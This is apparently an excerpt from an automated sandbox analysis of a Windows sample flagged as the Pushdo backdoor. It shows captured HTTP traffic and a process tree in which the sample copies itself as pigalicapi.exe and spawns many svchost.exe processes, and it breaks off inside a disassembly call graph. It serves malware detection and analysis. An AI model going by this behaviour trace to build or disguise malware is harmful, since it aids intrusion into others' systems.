                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC145INData Raw: 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 70 79 72 69 67 68 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f
                                                                                                                                                                                                                                                  Data Ascii: ></section></div></div></div></section><section id="g-copyright"><div class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title="" rel="home" class="g-foo
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC146INData Raw: 35 30 63 0d 0a 3d 22 67 2d 73 6f 63 69 61 6c 2d 74 65 78 74 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a
                                                                                                                                                                                                                                                  Data Ascii: 50c="g-social-text"></span></a></div></div></div></div></div></section></div><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/j
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC148INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:21:52:00
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\CX17SY6xF6.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\CX17SY6xF6.exe
                                                                                                                                                                                                                                                  Imagebase:0x10d0000
                                                                                                                                                                                                                                                  File size:647'680 bytes
                                                                                                                                                                                                                                                  MD5 hash:CA67C9C17A701B0664B90DE372ACDFB1
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000000.00000002.860363475.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                  Start time:21:52:29
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\pigalicapi.exe"
                                                                                                                                                                                                                                                  Imagebase:0xef0000
                                                                                                                                                                                                                                                  File size:647'680 bytes
                                                                                                                                                                                                                                                  MD5 hash:CA67C9C17A701B0664B90DE372ACDFB1
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000003.00000002.863723197.0000000001500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                  • Detection: 29%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                  Start time:21:52:38
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\pigalicapi.exe"
                                                                                                                                                                                                                                                  Imagebase:0xef0000
                                                                                                                                                                                                                                                  File size:647'680 bytes
                                                                                                                                                                                                                                                  MD5 hash:CA67C9C17A701B0664B90DE372ACDFB1
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                  Start time:21:52:54
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                                                                                                                  File size:44'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                  Start time:21:53:31
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                                                                                                                  File size:44'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                  Start time:21:53:32
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                                                                                                                  File size:44'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                  Start time:21:53:32
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                                                                                                                  File size:44'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                  Start time:21:53:32
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                                                                                                                  File size:44'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                  Start time:21:53:33
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                                                                                                                  File size:44'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                  Start time:21:53:48
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                                                                                                                  File size:44'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                  Start time:21:53:48
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                                                                                                                  File size:44'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                  Start time:21:53:49
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                                                                                                                  File size:44'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                  Start time:21:53:50
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                                                                                                                  File size:44'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                                  Start time:21:53:50
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                                                                                                                  File size:44'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                  Start time:21:53:55
                                                                                                                                                                                                                                                  Start date:27/07/2023
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                                                                                                                  File size:44'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:4.7%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:7.9%
                                                                                                                                                                                                                                                    Total number of Nodes:1250
                                                                                                                                                                                                                                                    Total number of Limit Nodes:44
                                                                                                                                                                                                                                                    execution_graph 9169 10d9b1b 9170 10d9b26 9169->9170 9174 10d9b36 9169->9174 9175 10d9b3c 9170->9175 9173 10da6da _free 20 API calls 9173->9174 9176 10d9b4f 9175->9176 9177 10d9b55 9175->9177 9179 10da6da _free 20 API calls 9176->9179 9178 10da6da _free 20 API calls 9177->9178 9180 10d9b61 9178->9180 9179->9177 9181 10da6da _free 20 API calls 9180->9181 9182 10d9b6c 9181->9182 9183 10da6da _free 20 API calls 9182->9183 9184 10d9b77 9183->9184 9185 10da6da _free 20 API calls 9184->9185 9186 10d9b82 9185->9186 9187 10da6da _free 20 API calls 9186->9187 9188 10d9b8d 9187->9188 9189 10da6da _free 20 API calls 9188->9189 9190 10d9b98 9189->9190 9191 10da6da _free 20 API calls 9190->9191 9192 10d9ba3 9191->9192 9193 10da6da _free 20 API calls 9192->9193 9194 10d9bae 9193->9194 9195 10da6da _free 20 API calls 9194->9195 9196 10d9bbc 9195->9196 9201 10d9a02 9196->9201 9207 10d990e 9201->9207 9203 10d9a26 9204 10d9a52 9203->9204 9220 10d996f 9204->9220 9206 10d9a76 9206->9173 9208 10d991a ___scrt_is_nonwritable_in_current_image 9207->9208 9215 10daf81 EnterCriticalSection 9208->9215 9211 10d9924 9213 10da6da _free 20 API calls 9211->9213 9214 10d994e 9211->9214 9212 10d995b ___scrt_is_nonwritable_in_current_image 9212->9203 9213->9214 9216 10d9963 9214->9216 9215->9211 9219 10dafc9 LeaveCriticalSection 9216->9219 9218 10d996d 9218->9212 9219->9218 9221 10d997b ___scrt_is_nonwritable_in_current_image 9220->9221 9228 10daf81 EnterCriticalSection 9221->9228 9223 10d9985 9229 10d9be5 9223->9229 9225 10d9998 9233 10d99ae 9225->9233 9227 10d99a6 ___scrt_is_nonwritable_in_current_image 9227->9206 9228->9223 9230 10d9c1b __fassign 9229->9230 9231 10d9bf4 __fassign 9229->9231 9230->9225 9231->9230 9232 10dac2c __fassign 20 API calls 9231->9232 9232->9230 9236 10dafc9 LeaveCriticalSection 9233->9236 9235 10d99b8 9235->9227 9236->9235 9507 10dda2f 9508 10dda37 pre_c_initialization 9507->9508 9525 10e154f 9508->9525 9510 10dda42 pre_c_initialization 9532 10de3ac 9510->9532 9512 10ddacb 9513 10ddd8f ___scrt_fastfail 4 API calls 9512->9513 9515 10ddad2 ___scrt_initialize_default_local_stdio_options 9513->9515 9514 10dda57 __RTC_Initialize 9514->9512 9537 10de54d 9514->9537 9517 10dda70 pre_c_initialization 9517->9512 9518 10dda81 9517->9518 9540 10de60b InitializeSListHead 9518->9540 9520 10dda86 pre_c_initialization ___InternalCxxFrameHandler 9541 10de617 9520->9541 9522 10ddaa9 pre_c_initialization 9547 10d9e41 9522->9547 9524 10ddab4 pre_c_initialization 9526 10e155e 9525->9526 9527 10e1581 9525->9527 9526->9527 9528 10d9826 _free 20 API calls 9526->9528 9527->9510 9529 10e1571 9528->9529 9530 10d976a _abort 26 API calls 9529->9530 9531 10e157c 9530->9531 9531->9510 9533 10de3ba 9532->9533 9536 10de3bf ___scrt_initialize_onexit_tables 9532->9536 9534 10ddd8f ___scrt_fastfail 4 API calls 9533->9534 9533->9536 9535 10de442 9534->9535 9536->9514 9554 10de512 9537->9554 9540->9520 9592 10e16db 9541->9592 9543 10de628 9544 10de62f 9543->9544 9545 10ddd8f ___scrt_fastfail 4 API calls 9543->9545 9544->9522 9546 10de637 9545->9546 9548 10d9c30 ___FrameUnwindToState 47 API calls 9547->9548 9549 10d9e4c 9548->9549 9550 10d9e84 9549->9550 9551 10d9826 _free 20 API calls 9549->9551 9550->9524 9552 10d9e79 9551->9552 9553 10d976a _abort 26 API calls 9552->9553 9553->9550 9555 10de52f 9554->9555 9556 10de536 9554->9556 9560 10dd6ce 9555->9560 9563 10dd73e 9556->9563 9559 10de534 9559->9517 9561 10dd73e __onexit 29 API calls 9560->9561 9562 10dd6e0 9561->9562 9562->9559 9566 10dd445 9563->9566 9569 10dd37b 9566->9569 9568 10dd469 9568->9559 9570 10dd387 ___scrt_is_nonwritable_in_current_image 9569->9570 9577 10daf81 EnterCriticalSection 9570->9577 9572 10dd395 9578 10dd58d 9572->9578 9574 10dd3a2 9588 10dd3c0 9574->9588 9576 10dd3b3 ___scrt_is_nonwritable_in_current_image 9576->9568 9577->9572 9579 10dd5ab 9578->9579 9580 10dd5a3 try_get_function 9578->9580 9579->9580 9581 10dd604 9579->9581 9583 10dd91b __onexit 29 API calls 9579->9583 9580->9574 9581->9580 9582 10dd91b __onexit 29 API calls 9581->9582 9584 10dd61a 9582->9584 9585 10dd5fa 9583->9585 9586 10da6da _free 20 API calls 9584->9586 9587 10da6da _free 20 API calls 9585->9587 9586->9580 9587->9581 9591 10dafc9 LeaveCriticalSection 9588->9591 9590 10dd3ca 9590->9576 9591->9590 9593 10e16f9 pre_c_initialization 9592->9593 9597 10e1719 pre_c_initialization 9592->9597 9594 10d9826 _free 20 API calls 9593->9594 9595 10e170f 9594->9595 9596 10d976a _abort 26 API calls 9595->9596 9596->9597 9597->9543 8724 10db4bb 8727 10db3b9 8724->8727 8728 10d9c30 ___FrameUnwindToState 47 API calls 8727->8728 8729 10db3c6 8728->8729 8747 10db4d8 8729->8747 8731 10db3ce 8756 10db14d 8731->8756 8734 10db3e5 8735 10dbd19 __onexit 21 API calls 8736 10db3f6 8735->8736 8746 10db428 8736->8746 8763 10db57a 8736->8763 8739 10da6da _free 20 API calls 8739->8734 8740 10db440 8743 10db46c 8740->8743 8744 10da6da _free 20 API calls 8740->8744 8741 10db423 8742 10d9826 _free 20 API calls 8741->8742 8742->8746 8743->8746 8773 10db023 8743->8773 8744->8743 8746->8739 8748 10db4e4 ___scrt_is_nonwritable_in_current_image 8747->8748 8749 10d9c30 ___FrameUnwindToState 47 API calls 8748->8749 8751 10db4ee 8749->8751 8752 10db572 ___scrt_is_nonwritable_in_current_image 8751->8752 8754 10da63a _abort 47 API calls 8751->8754 8755 10da6da _free 20 API calls 8751->8755 8776 10daf81 EnterCriticalSection 8751->8776 8777 10db569 8751->8777 8752->8731 8754->8751 8755->8751 8781 10d5e73 8756->8781 8759 10db16e GetOEMCP 8762 10db197 8759->8762 8760 10db180 8761 10db185 GetACP 8760->8761 8760->8762 8761->8762 8762->8734 8762->8735 8764 10db14d 49 API calls 8763->8764 8765 10db599 8764->8765 8768 10db5ea IsValidCodePage 8765->8768 8770 10db5a0 8765->8770 8771 10db60f ___scrt_fastfail 8765->8771 8766 10ddc5f _ValidateLocalCookies 5 API calls 8767 10db41b 8766->8767 8767->8740 8767->8741 8769 10db5fc GetCPInfo 8768->8769 8768->8770 8769->8770 8769->8771 8770->8766 8932 10db225 GetCPInfo 8771->8932 9008 10dafe0 8773->9008 8775 10db047 8775->8746 8776->8751 8780 10dafc9 LeaveCriticalSection 8777->8780 8779 10db570 8779->8751 8780->8779 8782 10d5e86 8781->8782 8783 10d5e90 8781->8783 8782->8759 8782->8760 8783->8782 8784 10d9c30 ___FrameUnwindToState 47 API calls 8783->8784 8785 10d5eb1 8784->8785 8789 10d9d7f 8785->8789 8790 10d9d92 8789->8790 8792 10d5eca 8789->8792 8790->8792 8797 10dae79 8790->8797 8793 10d9dac 8792->8793 8794 10d9dbf 8793->8794 8795 10d9dd4 8793->8795 8794->8795 8796 10db4d8 __fassign 47 API calls 8794->8796 8795->8782 8796->8795 8798 10dae85 ___scrt_is_nonwritable_in_current_image 8797->8798 8799 10d9c30 ___FrameUnwindToState 47 API calls 8798->8799 8800 10dae8e 8799->8800 8803 10daedc ___scrt_is_nonwritable_in_current_image 8800->8803 8809 10daf81 EnterCriticalSection 8800->8809 8802 10daeac 8810 10daef0 8802->8810 8803->8792 8808 10da63a _abort 47 API calls 8808->8803 8809->8802 8811 10daec0 8810->8811 8812 10daefe __fassign 8810->8812 8814 10daedf 8811->8814 8812->8811 8817 10dac2c 8812->8817 8931 10dafc9 LeaveCriticalSection 8814->8931 8816 10daed3 8816->8803 8816->8808 8819 10dacac 8817->8819 8820 10dac42 8817->8820 8822 10da6da _free 20 API calls 8819->8822 8843 10dacfa 8819->8843 8820->8819 8826 10da6da _free 20 API calls 8820->8826 8827 10dac75 8820->8827 8821 10dad08 8832 10dad68 8821->8832 8844 10da6da 20 API calls _free 8821->8844 8823 10dacce 8822->8823 8824 10da6da _free 20 API calls 8823->8824 8828 10dace1 8824->8828 8825 10da6da _free 20 API calls 8831 10daca1 8825->8831 8833 10dac6a 8826->8833 8829 10da6da _free 20 API calls 8827->8829 8842 10dac97 8827->8842 8830 10da6da _free 20 API calls 8828->8830 8834 10dac8c 8829->8834 8835 10dacef 8830->8835 8836 10da6da _free 20 API calls 8831->8836 8837 10da6da _free 20 API calls 8832->8837 8845 10dba92 8833->8845 8873 10dbb90 8834->8873 8840 10da6da _free 20 API calls 8835->8840 8836->8819 8841 10dad6e 8837->8841 8840->8843 8841->8811 8842->8825 8885 10dad9f 8843->8885 8844->8821 8846 10dbaa3 8845->8846 8872 10dbb8c 8845->8872 8847 10dbab4 8846->8847 8848 10da6da _free 20 API calls 8846->8848 8849 10dbac6 8847->8849 8850 10da6da _free 20 API calls 8847->8850 8848->8847 8851 10da6da _free 20 API calls 8849->8851 8853 10dbad8 8849->8853 8850->8849 8851->8853 8852 10dbaea 8854 10dbafc 8852->8854 8856 10da6da _free 20 API calls 8852->8856 8853->8852 8855 10da6da _free 20 API calls 8853->8855 8857 10dbb0e 8854->8857 8858 10da6da _free 20 API calls 8854->8858 8855->8852 8856->8854 8859 10dbb20 8857->8859 8860 10da6da _free 20 API calls 8857->8860 8858->8857 8861 10dbb32 8859->8861 8863 10da6da _free 20 API calls 8859->8863 8860->8859 8862 10dbb44 8861->8862 8864 10da6da _free 20 API calls 8861->8864 8865 10dbb56 8862->8865 8866 10da6da _free 20 API calls 8862->8866 8863->8861 8864->8862 8867 10dbb68 8865->8867 8868 10da6da _free 20 API calls 8865->8868 8866->8865 8869 10dbb7a 8867->8869 8870 10da6da _free 20 API calls 8867->8870 8868->8867 8871 10da6da _free 20 API calls 8869->8871 8869->8872 8870->8869 8871->8872 8872->8827 8874 10dbb9d 8873->8874 8884 10dbbf5 8873->8884 8875 10dbbad 8874->8875 8876 10da6da _free 20 API calls 8874->8876 8877 10da6da _free 20 API calls 8875->8877 8881 10dbbbf 8875->8881 8876->8875 8877->8881 8878 10da6da _free 20 API calls 8879 10dbbd1 8878->8879 8880 10dbbe3 8879->8880 8882 10da6da _free 20 API calls 8879->8882 8883 10da6da _free 20 API calls 8880->8883 8880->8884 8881->8878 8881->8879 8882->8880 8883->8884 8884->8842 8886 10dadca 8885->8886 8887 10dadac 8885->8887 8886->8821 8887->8886 8891 10dbc35 8887->8891 8890 10da6da _free 20 API calls 8890->8886 8892 10dadc4 8891->8892 8893 10dbc46 8891->8893 8892->8890 8927 10dbbf9 8893->8927 8896 10dbbf9 __fassign 20 API calls 8897 10dbc59 8896->8897 8898 10dbbf9 __fassign 20 API calls 8897->8898 8899 10dbc64 8898->8899 8900 10dbbf9 __fassign 20 API calls 8899->8900 8901 10dbc6f 8900->8901 8902 10dbbf9 __fassign 20 API calls 8901->8902 8903 10dbc7d 8902->8903 8904 10da6da _free 20 API calls 8903->8904 8905 10dbc88 8904->8905 8906 10da6da _free 20 API calls 8905->8906 8907 10dbc93 8906->8907 8908 10da6da _free 20 API calls 8907->8908 8909 10dbc9e 8908->8909 8910 10dbbf9 __fassign 20 API calls 8909->8910 8911 10dbcac 8910->8911 8912 10dbbf9 __fassign 20 API calls 8911->8912 8913 10dbcba 8912->8913 8914 10dbbf9 __fassign 20 API calls 8913->8914 8915 10dbccb 8914->8915 8916 10dbbf9 __fassign 20 API calls 8915->8916 8917 10dbcd9 8916->8917 8918 10dbbf9 __fassign 20 API calls 8917->8918 8919 10dbce7 8918->8919 8920 10da6da _free 20 API calls 8919->8920 8921 10dbcf2 8920->8921 8922 10da6da _free 20 API calls 8921->8922 8923 10dbcfd 8922->8923 8924 10da6da _free 20 API calls 8923->8924 8925 10dbd08 8924->8925 8926 10da6da _free 20 API calls 8925->8926 8926->8892 8928 10dbc30 8927->8928 8929 10dbc20 8927->8929 8928->8896 8929->8928 8930 10da6da _free 20 API calls 8929->8930 8930->8929 8931->8816 8933 10db25f 8932->8933 8934 10db309 8932->8934 8942 10da4fd 8933->8942 8936 10ddc5f _ValidateLocalCookies 5 API calls 8934->8936 8938 10db3b5 8936->8938 8938->8770 8941 10dcaa6 53 API calls 8941->8934 8943 10d5e73 __fassign 47 API calls 8942->8943 8945 10da51d MultiByteToWideChar 8943->8945 8946 10da55b 8945->8946 8947 10da5f3 8945->8947 8949 10dbd19 __onexit 21 API calls 8946->8949 8952 10da57c __alloca_probe_16 ___scrt_fastfail 8946->8952 8948 10ddc5f _ValidateLocalCookies 5 API calls 8947->8948 8950 10da616 8948->8950 8949->8952 8956 10dcaa6 8950->8956 8951 10da5ed 8961 10da61a 8951->8961 8952->8951 8954 10da5c1 MultiByteToWideChar 8952->8954 8954->8951 8955 10da5dd GetStringTypeW 8954->8955 8955->8951 8957 10d5e73 __fassign 47 API calls 8956->8957 8958 10dcab9 8957->8958 8965 10dc889 8958->8965 8962 10da637 8961->8962 8963 10da626 8961->8963 8962->8947 8963->8962 8964 10da6da _free 20 API calls 8963->8964 8964->8962 8966 10dc8a4 8965->8966 8967 10dc8ca MultiByteToWideChar 8966->8967 8968 10dc8f4 8967->8968 8978 10dca7e 8967->8978 8972 10dc915 __alloca_probe_16 8968->8972 8973 10dbd19 __onexit 21 API calls 8968->8973 8969 